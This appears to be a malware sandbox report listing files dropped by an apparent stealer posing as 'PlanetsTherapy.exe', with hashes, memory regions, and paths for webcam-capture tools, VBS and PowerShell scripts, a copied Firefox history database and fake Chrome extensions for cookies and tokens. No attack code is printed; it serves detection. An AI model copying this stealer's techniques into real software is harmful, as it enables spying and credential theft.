SHA1 e1b2a763dd6c42439656e4e55aba0f3610ff3784
SHA256 bbcbb170242d9ff1b56680a80b1f8755df1135f9c714535ff3b3f575442f38dc
SHA512 dffd59d775dbb89cd886a2212fb9fe4cf0b2bdd7f2c00f8dc7c6b2287053b4971c8c6c033109ff1f90cdacea082e44d3c19fa76325d24976420c418218e701f1

C:\Users\Admin\AppData\Local\Temp\nsn18C4.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\prey-webcam.exe

MD5 471b15abc9f2e98fb7ed7361d3f045eb
SHA1 95b5798d80a9410872f6ed485ae2b43ca3745540
SHA256 7c262639cb22348dfd627dc07c76e8748e5bcacde2dcf1614773ab174c831004
SHA512 5b3b59aa1dbaef31b0ff6ccde082d7c312e39e311a46fe20d590d5d7765f934d3b663da9609ff4fb7beba2e8fa85376cf74f14ae077f3c0b49189cc28c30163a

C:\Users\Admin\AppData\Local\Temp\nsn18C4.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\snapshot.exe

MD5 16a12bdc986207390dd79d658a6b2263
SHA1 b4b41f62cbc1e1ede786c6e30e11df8e61750bad
SHA256 50a8dd2f292bea9190204a42de067a34d5cbbec53746d40fe5b067fc85190bac
SHA512 d20394028c5d3ca46bb4879cac40da07b7d857f9a4a834bb4db4bd047f1a3265a80e1f7528244da6ee97c2f3e0cb5b2e51bc88eeb382a027939c2188e66dcdd9

C:\Users\Admin\AppData\Local\Temp\nsn18C4.tmp\7z-out\swiftshader\libGLESv2.dll

MD5 c0b36d56d83e601bf246f7709a8c5f9d
SHA1 b025a6070f7d61c7d1827856d2d4043834fd23f2
SHA256 45bb5e1f8dd87129ac0a75c78f8f29d06e3ac182a00fc5199b692068f1e05a53
SHA512 e429ae63bd8a7d5a936a638783511693e8fbbc91d97779b3d4dd3f0880f1c8a820106bfb57cf7ee6b3639f19165de87bbe127aadd81218689fc6c8fada2106d1

C:\Users\Admin\AppData\Local\Temp\nsn18C4.tmp\7z-out\swiftshader\libEGL.dll

MD5 19dc9ee70e7765bb63a66b6826e8ecb7
SHA1 1a12f983f8b35cc2955d30657971f113c47dc164
SHA256 83d5719abee35e051d984510e1d5d9317a109031698814742b59bdbbe7d4e30f
SHA512 1fda2bcc4b2e70987ca6011ab2534007ae4f752016d29a588aaae839bb25c35e03773f220b6a8e926cf2643997e7d4c0f28743304269b2c55642ce12934def68

C:\Users\Admin\AppData\Local\Temp\nsn18C4.tmp\StdUtils.dll

MD5 c6a6e03f77c313b267498515488c5740
SHA1 3d49fc2784b9450962ed6b82b46e9c3c957d7c15
SHA256 b72e9013a6204e9f01076dc38dabbf30870d44dfc66962adbf73619d4331601e
SHA512 9870c5879f7b72836805088079ad5bbafcb59fc3d9127f2160d4ec3d6e88d3cc8ebe5a9f5d20a4720fe6407c1336ef10f33b2b9621bc587e930d4cbacf337803

C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe

MD5 174028c95f4c64ae9c96becc415d6a1c
SHA1 0e51173240b159be5f85c4acbe09b83cd976eba1
SHA256 4324835487ae381a57799bbe0f7412c030158bd77da9d44872ab56e0e53ee632
SHA512 04b6643ea8484e611f3be46cb98a9b569923ffbe7602f56a8752633d9a34fad56fa9fbf1afa658da6797b963132275b0455fa97f82221c7b2071bbe36143b97e

C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\resources\app.asar

MD5 27b8b8c23a2877703814ed7a2032559c
SHA1 311f38cf19c3c01f51095f52f2867b8995ed3e6f
SHA256 d0ab1322177ce82f1aeb6b482a153363ea7c0662ac0baa356fa0ff6022501605
SHA512 a5edcc1145c159a54266b0e3c8680599cd9353a70405fb29c9a6d47c9bc37bcf1c731528434f497064d0c036ac5ca41705f3d70ffe878d4f1cde13e6dc834e72

C:\Users\Admin\AppData\Local\Temp\6a7f5c71-075f-47a3-a709-c8781f2e1d97.tmp.node

MD5 3072b68e3c226aff39e6782d025f25a8
SHA1 cf559196d74fa490ac8ce192db222c9f5c5a006a
SHA256 7fb52b781709b065c240b6b81394be6e72e53fe11d7c8e0f7b49dd417eb78a01
SHA512 61ebc72c20195e99244d95af1ab44fa06201a1aee2b5da04490fdc4312e8324a40b0e15a7b42fab5179753d767c1d08ae1a7a56ac71a6e100e63f83db849ee61

C:\Users\Admin\AppData\Local\Temp\b1db3742-7492-4a32-a707-58409638d69a.tmp.node

MD5 fef7cace7e9b70252eb0cad3c803f811
SHA1 719437697b9351e84af9810e281786849f3a252d
SHA256 5c255845e9397ec5aede7abfe94a0e281d11b1550ed6ec0a0540bccf89bb5f7c
SHA512 12ac8c8ff239a1f79c13c65edf747b135c8e2123e6080255665bc1a8f85eb4b74a557de5f59e03a5e95dbe590b92f764b4c7f6f26b21e37084e2d58357b84f97

memory/4004-578-0x00007FFE2A180000-0x00007FFE2A181000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe

MD5 0b30835ab954659ded64af18fedd19a3
SHA1 59b113ca933b39adc6b0248a1ccb2fb0ee04f983
SHA256 f0079d93ed31cf20874acd1caac934cf0d19d0dab230df82991525499deda658
SHA512 eb910f08a70e8c0adc0b2b8d6dd123fc0ed2f3b22df4ebc69a59b2a6f2dfbb54287e77b285e324144c323001739330d02785b0ab6b9589e85482e6c284121ef9

C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe

MD5 008f11f6d9dc0521882a9fd22c391c95
SHA1 cab153a19887fc94bd32658d628496f1318a3c4c
SHA256 b2360d216777a78f437cdc9cd57d2c996bc909c84051120a941a5c6ba251c9d7
SHA512 b59128d551ab0979e6cdcf45804b86cb53ce5a2f0a784ba4f059b70b8f27dfcdb11ec3050bf3a0b98cce3e15905fe457261cfaf72c2de2411358232131d92b04

C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\ffmpeg.dll

MD5 51b6f6aaa0e4a78294c7640266285abe
SHA1 721ec031a2db783062042777327fcbce6b68ab67
SHA256 bfd93f702ffd4ab278d2a847192f808d1216220fd9cf1a60235be6c0291964ae
SHA512 7a03c091a15d2c903799829713be6a73531d8e01688d8b2dbf8e2c96a1dcf0ccefb1ce03aacca1898326a1f309c387949dd34954ca51c90b9e0b3743dbc390fb

C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe

MD5 510e672bac5794f340e910c3de7c3778
SHA1 0d4829d42377d8f1d7fd888f92ace67e3f9c699a
SHA256 666573abec589eef92798213e2425dfa09c3890db045d007e5387173d86e400f
SHA512 046e6d740c5ba8475f457fb0b556bfc3e970d6feb11d8c549a35be3f754a39cca48411a1bf0d32a66ea9fc3ab709e1483144133c06c209d6df60d204a9e1a4e2

memory/4004-593-0x00000241EEB80000-0x00000241EEC4D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vzymr12y.h0q.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3172-614-0x000001A66B520000-0x000001A66B542000-memory.dmp

memory/3172-619-0x00007FFE0A630000-0x00007FFE0B0F1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 6cf293cb4d80be23433eecf74ddb5503
SHA1 24fe4752df102c2ef492954d6b046cb5512ad408
SHA256 b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA512 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 235a8eb126d835efb2e253459ab8b089
SHA1 293fbf68e6726a5a230c3a42624c01899e35a89f
SHA256 5ffd4a816ae5d1c1a8bdc51d2872b7dd99e9c383c88001d303a6f64a77773686
SHA512 a83d17203b581491e47d65131e1efc8060ff04d1852e3415fc0a341c6a9691ef9f4cf4dd29d2f6d0032a49f2ba4bd36c35b3f472f0ce5f78f4bb139124760e92

memory/2868-635-0x00007FFE0A630000-0x00007FFE0B0F1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 446dd1cf97eaba21cf14d03aebc79f27
SHA1 36e4cc7367e0c7b40f4a8ace272941ea46373799
SHA256 a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf
SHA512 a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

memory/2876-651-0x00007FFE0A630000-0x00007FFE0B0F1000-memory.dmp

memory/2876-652-0x00000250B1EA0000-0x00000250B1EB0000-memory.dmp

memory/2876-653-0x00000250B1EA0000-0x00000250B1EB0000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\PlanetsTherapy.exe

MD5 3b2efa2a4e65bb9018535ba7120bbec9
SHA1 d1bfcf9fdf3200ade60e2c1a0ac4370531193f12
SHA256 0ce6468d55e9a83f2d31d02309ed70dc3e894a6f90626819dc414a9ae863030d
SHA512 49c3858c9306990ce98c70fe26676984fe2abb215793aa0988ed48d8a32ecc4f2271e16627612d5a03ba1ba4e5eacde38758538aadd5f7968305883682b8d47b

memory/2876-656-0x00007FFE0A630000-0x00007FFE0B0F1000-memory.dmp

C:\Users\Admin\AppData\Roaming\r3naeRIDdQoK.vbs

MD5 4026805d36b03d1b13caf96237877906
SHA1 4677e317838dd4e6396e2eda0c312b43f83884e6
SHA256 1382c082069440c4555f4db936ef679eb0c8e36f5b4d87dd59fe758b49d7c615
SHA512 ba202a22d68bd508212365a882914a4aed43c09414bc75d44a318d32fc555471f9639e00e1842f08af2f2df79891e8056fd8e835364c2aeb118f7ccd5693a16d

memory/3172-698-0x00007FFE0A630000-0x00007FFE0B0F1000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 0a478b3d774ebccc8150c517aa9520fb
SHA1 01615cac1e3dfe2eede4f177f26fbf7830ad7975
SHA256 d27670edcfad4d84339a403ba411c7dad122d5151c986922b09fd951b43da447
SHA512 483385f1814e6dbbc55d3e445c15015705e6b32c1799090ac8c01f1f8ce14b37c981b3959767024f6b4d3fe8b8e1bf240363a883d7a95af3026d15f808332435

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 e09aded99d44eb2cc44d73d6f4696ea1
SHA1 ed9f97ec8e92d8bf7313b83f10a2b8ece6f55aec
SHA256 cb4e168e130319295f564aaf0f756dfacb86dbef4d648af20c6982aab3637dfb
SHA512 29163581c49c970c6f6a75e4e3f2a5d2d12f336ad8951de1a068511de4f524a745d5dec06bbc2f8f196b79749bea8e717527624d72379f3f8344f0b464272868

memory/4452-717-0x00007FFE0A630000-0x00007FFE0B0F1000-memory.dmp

memory/4628-718-0x00007FFE0A630000-0x00007FFE0B0F1000-memory.dmp

memory/4628-719-0x0000012463E40000-0x0000012463E50000-memory.dmp

memory/4452-729-0x000001DC320C0000-0x000001DC320D0000-memory.dmp

memory/4452-739-0x000001DC320C0000-0x000001DC320D0000-memory.dmp

memory/3048-748-0x0000021DE2D20000-0x0000021DE2D30000-memory.dmp

memory/4512-764-0x00007FFE0A630000-0x00007FFE0B0F1000-memory.dmp

memory/4812-770-0x0000019CF21F0000-0x0000019CF2200000-memory.dmp

memory/4812-771-0x0000019CF21F0000-0x0000019CF2200000-memory.dmp

memory/4512-772-0x0000019D488E0000-0x0000019D488F0000-memory.dmp

memory/4628-773-0x0000012463E40000-0x0000012463E50000-memory.dmp

memory/2868-774-0x00007FFE0A630000-0x00007FFE0B0F1000-memory.dmp

memory/3048-775-0x00007FFE0A630000-0x00007FFE0B0F1000-memory.dmp

memory/4512-777-0x0000019D488E0000-0x0000019D488F0000-memory.dmp

memory/4812-776-0x00007FFE0A630000-0x00007FFE0B0F1000-memory.dmp

memory/3048-779-0x0000021DE2D20000-0x0000021DE2D30000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\sTEixZrDta9V_temp.ps1

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x3x6afp6.default-release\places.sqlite_tmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_NBPdrq.vbs

C:\Users\Admin\AppData\Local\Temp\DEybUpMWLn7J4ftWEJYI\System\NUPNSVML - 2023-12-19_153626.png

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

C:\Users\Admin\AppData\Roaming\salut0yn5i.ps1

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\ProgramData\ChromeExtensionsNova\extension-cookies\images\logo.png

C:\ProgramData\ChromeExtensionsNova\extension-cookies\images\logo128.png

C:\ProgramData\ChromeExtensionsNova\extension-cookies\images\logo16.png

C:\ProgramData\ChromeExtensionsNova\extension-cookies\images\logo48.png

C:\ProgramData\ChromeExtensionsNova\extension-cookies\manifest.json

C:\ProgramData\ChromeExtensionsNova\extension-tokens\js\jquery-3.5.1.min.js

C:\ProgramData\ChromeExtensionsNova\extension-tokens\manifest.json
